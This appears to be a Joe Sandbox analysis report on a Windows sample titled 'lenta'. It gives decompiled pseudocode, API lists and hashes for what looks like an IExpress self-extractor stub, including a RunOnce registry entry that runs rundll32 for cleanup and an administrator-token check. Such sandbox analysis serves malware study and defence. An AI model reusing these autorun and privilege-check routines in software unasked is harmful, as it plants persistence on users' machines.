                            0x00000000
                            0x00000000
                            0x00eb28c1
                            0x00eb2831
                            0x00eb27dd
                            0x00eb27d5
                            0x00eb28e5

                            APIs
                            • CharUpperA.USER32(92AE1240,00000000,00000000,00000000), ref: 00EB27A8
                            • CharNextA.USER32(0000054D), ref: 00EB27B5
                            • CharNextA.USER32(00000000), ref: 00EB27BC
                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2829
                            • RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2852
                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2870
                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB28A0
                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00EB28AA
                            • GetSystemDirectoryA.KERNEL32 ref: 00EB28B9
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00EB27E4
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                            • API String ID: 2659952014-2428544900
                            • Opcode ID: a483b094d5c9bf3cca2da134f8f18cb52d14f5779df07ab67773522177144b3c
                            • Instruction ID: 4585cb3f5747315a8400724566697252ff60ff62a2a9ff9caf044e19f28f6fbe
                            • Opcode Fuzzy Hash: a483b094d5c9bf3cca2da134f8f18cb52d14f5779df07ab67773522177144b3c
                            • Instruction Fuzzy Hash: B941A2B1A0012CAFDB299B65DC85AFB7BBDEF15700F0450A9F649F2110DB708E858FA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E00EB2267() {
                            				signed int _v8;
                            				char _v268;
                            				char _v836;
                            				void* _v840;
                            				int _v844;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t19;
                            				intOrPtr _t33;
                            				void* _t38;
                            				intOrPtr* _t42;
                            				void* _t45;
                            				void* _t47;
                            				void* _t49;
                            				signed int _t51;
                            
                            				_t19 =  *0xeb8004; // 0x92ae1240
                            				_t20 = _t19 ^ _t51;
                            				_v8 = _t19 ^ _t51;
                            				if( *0xeb8530 != 0) {
                            					_push(_t49);
                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                            						_push(_t38);
                            						_v844 = 0x238;
                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                            							_push(_t47);
                            							memset( &_v268, 0, 0x104);
                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                            								E00EB658A( &_v268, 0x104, 0xeb1140);
                            							}
                            							_push("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
                            							E00EB171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                            							_t42 =  &_v836;
                            							_t45 = _t42 + 1;
                            							_pop(_t47);
                            							do {
                            								_t33 =  *_t42;
                            								_t42 = _t42 + 1;
                            							} while (_t33 != 0);
                            							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                            						}
                            						_t20 = RegCloseKey(_v840);
                            						_pop(_t38);
                            					}
                            					_pop(_t49);
                            				}
                            				return E00EB6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                            			}



















                            0x00eb2272
                            0x00eb2277
                            0x00eb2279
                            0x00eb2283
                            0x00eb2289
                            0x00eb22ab
                            0x00eb22b1
                            0x00eb22c4
                            0x00eb22e0
                            0x00eb22e6
                            0x00eb22f5
                            0x00eb230d
                            0x00eb231c
                            0x00eb231c
                            0x00eb2321
                            0x00eb233a
                            0x00eb2342
                            0x00eb2348
                            0x00eb234b
                            0x00eb234c
                            0x00eb234c
                            0x00eb234e
                            0x00eb234f
                            0x00eb236e
                            0x00eb236e
                            0x00eb237a
                            0x00eb2380
                            0x00eb2380
                            0x00eb2381
                            0x00eb2381
                            0x00eb238f

                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00EB22A3
                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00EB22D8
                            • memset.MSVCRT ref: 00EB22F5
                            • GetSystemDirectoryA.KERNEL32 ref: 00EB2305
                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00EB236E
                            • RegCloseKey.ADVAPI32(?), ref: 00EB237A
                            Strings
                            • wextract_cleanup0, xrefs: 00EB227C, 00EB22CD, 00EB2363
                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB2321
                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00EB232D
                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00EB2299
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                            • API String ID: 3027380567-1264114338
                            • Opcode ID: 5ffd9f6e89c422b14609f0107f8841a23423b5993caa2d641586d30261bcb624
                            • Instruction ID: 9fce772b09eff139c667e7843aa8ed19c265e17b1b4a26cfd00912cafb3c605e
                            • Opcode Fuzzy Hash: 5ffd9f6e89c422b14609f0107f8841a23423b5993caa2d641586d30261bcb624
                            • Instruction Fuzzy Hash: 2D31F771A002186BDB31AB21DD49FEB7BBCEF14740F0401E9B64DB6150EA70AF88CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00EB3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				void* _t8;
                            				void* _t11;
                            				void* _t15;
                            				struct HWND__* _t16;
                            				struct HWND__* _t33;
                            				struct HWND__* _t34;
                            
                            				_t8 = _a8 - 0xf;
                            				if(_t8 == 0) {
                            					if( *0xeb8590 == 0) {
                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                            						 *0xeb8590 = 1;
                            					}
                            					L13:
                            					return 0;
                            				}
                            				_t11 = _t8 - 1;
                            				if(_t11 == 0) {
                            					L7:
                            					_push(0);
                            					L8:
                            					EndDialog(_a4, ??);
                            					L9:
                            					return 1;
                            				}
                            				_t15 = _t11 - 0x100;
                            				if(_t15 == 0) {
                            					_t16 = GetDesktopWindow();
                            					_t33 = _a4;
                            					E00EB43D0(_t33, _t16);
                            					SetDlgItemTextA(_t33, 0x834,  *0xeb8d4c);
                            					SetWindowTextA(_t33, "lenta");
                            					SetForegroundWindow(_t33);
                            					_t34 = GetDlgItem(_t33, 0x834);
                            					 *0xeb88b8 = GetWindowLongA(_t34, 0xfffffffc);
                            					SetWindowLongA(_t34, 0xfffffffc, E00EB30C0);
                            					return 1;
                            				}
                            				if(_t15 != 1) {
                            					goto L13;
                            				}
                            				if(_a12 != 6) {
                            					if(_a12 != 7) {
                            						goto L9;
                            					}
                            					goto L7;
                            				}
                            				_push(1);
                            				goto L8;
                            			}









                            0x00eb3108
                            0x00eb310b
                            0x00eb31b7
                            0x00eb31ca
                            0x00eb31d0
                            0x00eb31d0
                            0x00eb31da
                            0x00000000
                            0x00eb31da
                            0x00eb3111
                            0x00eb3114
                            0x00eb3136
                            0x00eb3136
                            0x00eb3138
                            0x00eb313b
                            0x00eb3141
                            0x00000000
                            0x00eb3143
                            0x00eb3116
                            0x00eb311b
                            0x00eb314b
                            0x00eb3151
                            0x00eb3158
                            0x00eb316a
                            0x00eb3176
                            0x00eb317d
                            0x00eb318b
                            0x00eb319e
                            0x00eb31a3
                            0x00000000
                            0x00eb31ad
                            0x00eb3120
                            0x00000000
                            0x00000000
                            0x00eb312a
                            0x00eb3134
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb3134
                            0x00eb312c
                            0x00000000

                            APIs
                            • EndDialog.USER32(?,00000000), ref: 00EB313B
                            • GetDesktopWindow.USER32 ref: 00EB314B
                            • SetDlgItemTextA.USER32(?,00000834), ref: 00EB316A
                            • SetWindowTextA.USER32(?,lenta), ref: 00EB3176
                            • SetForegroundWindow.USER32(?), ref: 00EB317D
                            • GetDlgItem.USER32(?,00000834), ref: 00EB3185
                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00EB3190
                            • SetWindowLongA.USER32(00000000,000000FC,00EB30C0), ref: 00EB31A3
                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00EB31CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                            • String ID: lenta
                            • API String ID: 3785188418-2780258678
                            • Opcode ID: 9e1abff3daece18d66403ef5fc139e3431be312bc82f84ecfc8bb6c8eb216e7c
                            • Instruction ID: 94f94af8ea49d38030adeda724f4943726ddfe876bea671599745d31a540c993
                            • Opcode Fuzzy Hash: 9e1abff3daece18d66403ef5fc139e3431be312bc82f84ecfc8bb6c8eb216e7c
                            • Instruction Fuzzy Hash: E5119D31206211BFDB215F39ED0EBDB3AACEB4A725F141720F855B11E0DB719649CA52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E00EB18A3(void* __edx, void* __esi) {
                            				signed int _v8;
                            				short _v12;
                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                            				char _v20;
                            				long _v24;
                            				void* _v28;
                            				void* _v32;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t23;
                            				long _t45;
                            				void* _t49;
                            				int _t50;
                            				void* _t52;
                            				signed int _t53;
                            
                            				_t51 = __esi;
                            				_t49 = __edx;
                            				_t23 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t23 ^ _t53;
                            				_t25 =  *0xeb8128; // 0x2
                            				_t45 = 0;
                            				_v12 = 0x500;
                            				_t50 = 2;
                            				_v16.Value = 0;
                            				_v20 = 0;
                            				if(_t25 != _t50) {
                            					L20:
                            					return E00EB6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                            				}
                            				if(E00EB17EE( &_v20) != 0) {
                            					_t25 = _v20;
                            					if(_v20 != 0) {
                            						 *0xeb8128 = 1;
                            					}
                            					goto L20;
                            				}
                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                            					goto L20;
                            				}
                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                            					L17:
                            					CloseHandle(_v28);
                            					_t25 = _v20;
                            					goto L20;
                            				} else {
                            					_push(__esi);
                            					_t52 = LocalAlloc(0, _v24);
                            					if(_t52 == 0) {
                            						L16:
                            						_pop(_t51);
                            						goto L17;
                            					}
                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                            						L15:
                            						LocalFree(_t52);
                            						goto L16;
                            					} else {
                            						if( *_t52 <= 0) {
                            							L14:
                            							FreeSid(_v32);
                            							goto L15;
                            						}
                            						_t15 = _t52 + 4; // 0x4
                            						_t50 = _t15;
                            						while(EqualSid( *_t50, _v32) == 0) {
                            							_t45 = _t45 + 1;
                            							_t50 = _t50 + 8;
                            							if(_t45 <  *_t52) {
                            								continue;
                            							}
                            							goto L14;
                            						}
                            						 *0xeb8128 = 1;
                            						_v20 = 1;
                            						goto L14;
                            					}
                            				}
                            			}


















                            0x00eb18a3
                            0x00eb18a3
                            0x00eb18ab
                            0x00eb18b2
                            0x00eb18b5
                            0x00eb18be
                            0x00eb18c0
                            0x00eb18c6
                            0x00eb18c7
                            0x00eb18ca
                            0x00eb18cf
                            0x00eb19c9
                            0x00eb19d8
                            0x00eb19d8
                            0x00eb18df
                            0x00eb19b8
                            0x00eb19bd
                            0x00eb19bf
                            0x00eb19bf
                            0x00000000
                            0x00eb19bd
                            0x00eb18fa
                            0x00000000
                            0x00000000
                            0x00eb1912
                            0x00eb19aa
                            0x00eb19ad
                            0x00eb19b3
                            0x00000000
                            0x00eb1927
                            0x00eb1927
                            0x00eb1932
                            0x00eb1936
                            0x00eb19a9
                            0x00eb19a9
                            0x00000000
                            0x00eb19a9
                            0x00eb194c
                            0x00eb19a2
                            0x00eb19a3
                            0x00000000
                            0x00eb196e
                            0x00eb1970
                            0x00eb1999
                            0x00eb199c
                            0x00000000
                            0x00eb199c
                            0x00eb1972
                            0x00eb1972
                            0x00eb1975
                            0x00eb1984
                            0x00eb1985
                            0x00eb198a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb198c
                            0x00eb1991
                            0x00eb1996
                            0x00000000
                            0x00eb1996
                            0x00eb194c

                            APIs
                              • Part of subcall function 00EB17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00EB18DD), ref: 00EB181A
                              • Part of subcall function 00EB17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00EB182C
                              • Part of subcall function 00EB17EE: AllocateAndInitializeSid.ADVAPI32(00EB18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EB18DD), ref: 00EB1855
                              • Part of subcall function 00EB17EE: FreeSid.ADVAPI32(?,?,?,?,00EB18DD), ref: 00EB1883
                              • Part of subcall function 00EB17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00EB18DD), ref: 00EB188A
                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00EB18EB
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00EB18F2
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00EB190A
                            • GetLastError.KERNEL32 ref: 00EB1918
                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00EB192C
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00EB1944
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EB1964
                            • EqualSid.ADVAPI32(00000004,?), ref: 00EB197A
                            • FreeSid.ADVAPI32(?), ref: 00EB199C
                            • LocalFree.KERNEL32(00000000), ref: 00EB19A3
                            • CloseHandle.KERNEL32(?), ref: 00EB19AD
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                            • String ID:
                            • API String ID: 2168512254-0
                            • Opcode ID: 96f8d1d3c5216c58564412aca5ea31f057d7eb6ee0851c9a4156fc5ecfc7adbf
                            • Instruction ID: fb3bf06aa4345d243a4707a689f7b66a989cf89193803343bee15e2a71ea5f3f
                            • Opcode Fuzzy Hash: 96f8d1d3c5216c58564412aca5ea31f057d7eb6ee0851c9a4156fc5ecfc7adbf
                            • Instruction Fuzzy Hash: 1A314C71A00209AFDF20AFA6DC68AEFBBBCFF48354F541569E545F2150DB309909CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E00EB468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                            				long _t4;
                            				void* _t11;
                            				CHAR* _t14;
                            				void* _t15;
                            				long _t16;
                            
                            				_t14 = __ecx;
                            				_t11 = __edx;
                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                            				_t16 = _t4;
                            				if(_t16 <= _a4 && _t11 != 0) {
                            					if(_t16 == 0) {
                            						L5:
                            						return 0;
                            					}
                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                            					if(_t15 == 0) {
                            						goto L5;
                            					}
                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                            					FreeResource(_t15);
                            					return _t16;
                            				}
                            				return _t4;
                            			}








                            0x00eb4699
                            0x00eb469b
                            0x00eb46a9
                            0x00eb46af
                            0x00eb46b4
                            0x00eb46bc
                            0x00eb46f9
                            0x00000000
                            0x00eb46f9
                            0x00eb46d9
                            0x00eb46dd
                            0x00000000
                            0x00000000
                            0x00eb46e5
                            0x00eb46ef
                            0x00000000
                            0x00eb46f5
                            0x00eb46ff

                            APIs
                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                            • SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                            • LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                            • LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                            • memcpy_s.MSVCRT ref: 00EB46E5
                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                            • String ID: TITLE$lenta
                            • API String ID: 3370778649-2035842925
                            • Opcode ID: 02bfd4c331e3fbe73e2d93bf1fb8a9444879f87ec53efde4061f10404e7a2cec
                            • Instruction ID: 4bf7b935562e52e03b4d654017a7fa676784a89b19f7997a6978e84e0c1072ef
                            • Opcode Fuzzy Hash: 02bfd4c331e3fbe73e2d93bf1fb8a9444879f87ec53efde4061f10404e7a2cec
                            • Instruction Fuzzy Hash: 750186776442107FE71027A6AC4DFAB7E2CDBC6B51F080134FA89B6191C9718C4586A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00EB681F(void* __ebx) {
                            				signed int _v8;
                            				char _v20;
                            				struct _OSVERSIONINFOA _v168;
                            				void* _v172;
                            				int* _v176;
                            				int _v180;
                            				int _v184;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t19;
                            				long _t31;
                            				signed int _t35;
                            				void* _t36;
                            				intOrPtr _t41;
                            				signed int _t44;
                            
                            				_t36 = __ebx;
                            				_t19 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t19 ^ _t44;
                            				_t41 =  *0xeb81d8; // 0xfffffffe
                            				_t43 = 0;
                            				_v180 = 0xc;
                            				_v176 = 0;
                            				if(_t41 == 0xfffffffe) {
                            					 *0xeb81d8 = 0;
                            					_v168.dwOSVersionInfoSize = 0x94;
                            					if(GetVersionExA( &_v168) == 0) {
                            						L12:
                            						_t41 =  *0xeb81d8; // 0xfffffffe
                            					} else {
                            						_t41 = 1;
                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                            							goto L12;
                            						} else {
                            							_t31 = RegQueryValueExA(_v172, 0xeb1140, 0,  &_v184,  &_v20,  &_v180);
                            							_t43 = _t31;
                            							RegCloseKey(_v172);
                            							if(_t31 != 0) {
                            								goto L12;
                            							} else {
                            								_t40 =  &_v176;
                            								if(E00EB66F9( &_v20,  &_v176) == 0) {
                            									goto L12;
                            								} else {
                            									_t35 = _v176 & 0x000003ff;
                            									if(_t35 == 1 || _t35 == 0xd) {
                            										 *0xeb81d8 = _t41;
                            									} else {
                            										goto L12;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_t18 =  &_v8; // 0xeb463b
                            				return E00EB6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                            			}


















                            0x00eb681f
                            0x00eb682a
                            0x00eb6831
                            0x00eb6836
                            0x00eb683c
                            0x00eb683e
                            0x00eb6848
                            0x00eb6851
                            0x00eb685d
                            0x00eb6864
                            0x00eb6876
                            0x00eb693a
                            0x00eb693a
                            0x00eb687c
                            0x00eb687e
                            0x00eb6885
                            0x00000000
                            0x00eb68d6
                            0x00eb68f4
                            0x00eb6900
                            0x00eb6902
                            0x00eb690a
                            0x00000000
                            0x00eb690c
                            0x00eb690c
                            0x00eb691c
                            0x00000000
                            0x00eb691e
                            0x00eb6924
                            0x00eb692b
                            0x00eb6932
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb692b
                            0x00eb691c
                            0x00eb690a
                            0x00eb6885
                            0x00eb6876
                            0x00eb6940
                            0x00eb6951

                            APIs
                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00EB686E
                            • GetSystemMetrics.USER32(0000004A), ref: 00EB68A7
                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00EB68CC
                            • RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,?,0000000C), ref: 00EB68F4
                            • RegCloseKey.ADVAPI32(?), ref: 00EB6902
                              • Part of subcall function 00EB66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00EB691A), ref: 00EB6741
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                            • String ID: ;F$Control Panel\Desktop\ResourceLocale
                            • API String ID: 3346862599-574545411
                            • Opcode ID: bf21fd290622801881b9db1e7e964f2617e4016286ee49941be4ec5ee2f46170
                            • Instruction ID: c7be66426ed662acfdd15bf13fec6422c48a078bc18cdc7ddcd114b13cabc29b
                            • Opcode Fuzzy Hash: bf21fd290622801881b9db1e7e964f2617e4016286ee49941be4ec5ee2f46170
                            • Instruction Fuzzy Hash: DA318431A013189FDF31CB1ADD04BEBB7B9EB85768F0401A5E949B2150DB349D89CF52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                            				void* _t7;
                            				void* _t11;
                            				struct HWND__* _t12;
                            				int _t22;
                            				struct HWND__* _t24;
                            
                            				_t7 = _a8 - 0x10;
                            				if(_t7 == 0) {
                            					EndDialog(_a4, 2);
                            					L11:
                            					return 1;
                            				}
                            				_t11 = _t7 - 0x100;
                            				if(_t11 == 0) {
                            					_t12 = GetDesktopWindow();
                            					_t24 = _a4;
                            					E00EB43D0(_t24, _t12);
                            					SetWindowTextA(_t24, "lenta");
                            					SetDlgItemTextA(_t24, 0x838,  *0xeb9404);
                            					SetForegroundWindow(_t24);
                            					goto L11;
                            				}
                            				if(_t11 == 1) {
                            					_t22 = _a12;
                            					if(_t22 < 6) {
                            						goto L11;
                            					}
                            					if(_t22 <= 7) {
                            						L8:
                            						EndDialog(_a4, _t22);
                            						return 1;
                            					}
                            					if(_t22 != 0x839) {
                            						goto L11;
                            					}
                            					 *0xeb91dc = 1;
                            					goto L8;
                            				}
                            				return 0;
                            			}








                            0x00eb3459
                            0x00eb345c
                            0x00eb34d8
                            0x00eb34de
                            0x00000000
                            0x00eb34e0
                            0x00eb345e
                            0x00eb3463
                            0x00eb349a
                            0x00eb34a0
                            0x00eb34a7
                            0x00eb34b2
                            0x00eb34c4
                            0x00eb34cb
                            0x00000000
                            0x00eb34cb
                            0x00eb3468
                            0x00eb346e
                            0x00eb3474
                            0x00000000
                            0x00000000
                            0x00eb347c
                            0x00eb348c
                            0x00eb3490
                            0x00000000
                            0x00eb3496
                            0x00eb3484
                            0x00000000
                            0x00000000
                            0x00eb3486
                            0x00000000
                            0x00eb3486
                            0x00000000

                            APIs
                            • EndDialog.USER32(?,?), ref: 00EB3490
                            • GetDesktopWindow.USER32 ref: 00EB349A
                            • SetWindowTextA.USER32(?,lenta), ref: 00EB34B2
                            • SetDlgItemTextA.USER32(?,00000838), ref: 00EB34C4
                            • SetForegroundWindow.USER32(?), ref: 00EB34CB
                            • EndDialog.USER32(?,00000002), ref: 00EB34D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Window$DialogText$DesktopForegroundItem
                            • String ID: lenta
                            • API String ID: 852535152-2780258678
                            • Opcode ID: 0acf5d59dddcebeb8f075ed2a26410298cd804057b7e8cf0a5196d26022e7199
                            • Instruction ID: 9e06851cf4187526d6988e09ae360f7df9a1b3323d9c3c0ef479247eac1d3442
                            • Opcode Fuzzy Hash: 0acf5d59dddcebeb8f075ed2a26410298cd804057b7e8cf0a5196d26022e7199
                            • Instruction Fuzzy Hash: B6012431241124AFCB1A1F7EED0E8EF3B64EB05701F045120FA62B69A0CB308F41DB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
